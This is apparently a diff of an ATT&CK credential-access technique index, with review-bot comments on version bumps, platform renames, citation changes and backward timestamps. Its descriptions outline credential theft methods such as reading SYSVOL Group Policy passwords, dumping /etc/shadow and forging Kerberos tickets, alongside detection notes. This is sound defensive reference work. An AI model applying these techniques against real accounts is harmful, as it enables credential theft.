Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46095,13 +46853,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
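Review bot: besides the rename of `Office 365`/`Azure AD`/`Google Workspace` to `Office Suite`/`Identity Provider`, this hunk also adds `IaaS` as a new platform for T1528, which is a scope change rather than a rename. Confirm it matches the upstream object for this version bump (1.3 to 1.4) and was not introduced by the generator.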
@@ -46157,44 +46916,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46211,25 +46937,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
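Review bot: the `modified` timestamp for T1556.008 goes backwards from 2023-10-31 to 2023-05-04, the third such regression in this patch (with T1557.001 and T1558.001). Three techniques moving to older last-modified dates in an update that otherwise advances every timestamp points to a mixed source; please check the bundle these objects were taken from. The rest of the T1552.006 reassembly (reordered `external_references`, `revoked: false`, spec version 3.2.0) is consistent with the other regenerated objects.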
@@ -46304,11 +47059,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46352,11 +47106,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -46380,8 +47133,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
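Review bot: the AWS-ADFS-Credential-Generator citation keeps `Damian Hickey` as author but its URL changes from `github.com/damianh/...` to `github.com/pvanbuijtene/...`, a different GitHub account. If the original repository is gone, an archived snapshot of the original (as done for the lockstepgroup and Kaspersky links elsewhere in this patch) preserves the attribution; if the new location is a fork, the description should say so.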
@@ -46397,11 +47150,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46412,11 +47164,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -46426,16 +47180,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -46473,13 +47227,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46488,6 +47239,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -46495,11 +47247,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -46517,13 +47269,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -46536,6 +47285,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -46549,12 +47299,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -46586,17 +47337,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
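Review bot: rewriting the Midnight Blizzard citation from `twitter.com` to `x.com` only changes the host; the post remains subject to the platform's access restrictions, so an archived copy would be a more durable reference, consistent with the web.archive.org links introduced elsewhere in this patch. The refreshed retrieval date is fine.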
@@ -46669,12 +47417,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46683,6 +47430,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -46701,18 +47449,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -46736,13 +47484,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46768,6 +47513,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -46779,18 +47525,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -46809,14 +47555,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -46845,24 +47588,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -46897,13 +47642,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -46981,14 +47723,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -47004,6 +47745,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47012,13 +47754,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -47026,15 +47768,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -47045,9 +47783,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -47093,7 +47830,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
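Review bot: the `modified` timestamp for T1557.002 moves backwards, from `2022-11-08T14:00:00.188Z` to `2022-07-22T18:37:22.176Z`, while every other technique in this diff moves forward to a 2024 date. That pattern usually means the generator read a stale copy of this one object; check the source bundle entry for attack-pattern T1557.002 before merging rather than treating this as a routine refresh.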
@@ -47112,17 +47849,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
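Review bot: T1557.002 keeps `x_mitre_attack_spec_version: 2.1.0` (context line at the top of this hunk) while its `spec_version` line is removed, whereas the other objects in this diff are re-emitted at 3.2.0. If the object genuinely has not been updated upstream that is acceptable, but together with the earlier `modified` date in the preceding hunk it should be verified explicitly.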
@@ -47155,10 +47891,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
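Review bot: for T1556.009 this hunk removes `SaaS` together with `Azure AD`, whereas the T1110, T1110.004 and T1556.006 hunks above keep `SaaS` next to the new `Office Suite` / `Identity Provider` entries. Confirm that dropping `SaaS` here matches the upstream object for T1556.009 rather than being a generator quirk, since it changes which platform indexes this technique appears in.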
@@ -47195,11 +47930,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47267,34 +48001,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47303,20 +48013,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -47348,7 +48080,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
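Review bot: the `modified` timestamp for T1558.002 goes backwards from `2021-04-29T14:49:39.188Z` to `2020-03-25T21:46:46.831Z`. As with T1557.002 earlier in this diff, a regressing date points to a stale source object; verify the bundle entry for T1558.002 before merging.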
@@ -47374,13 +48106,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
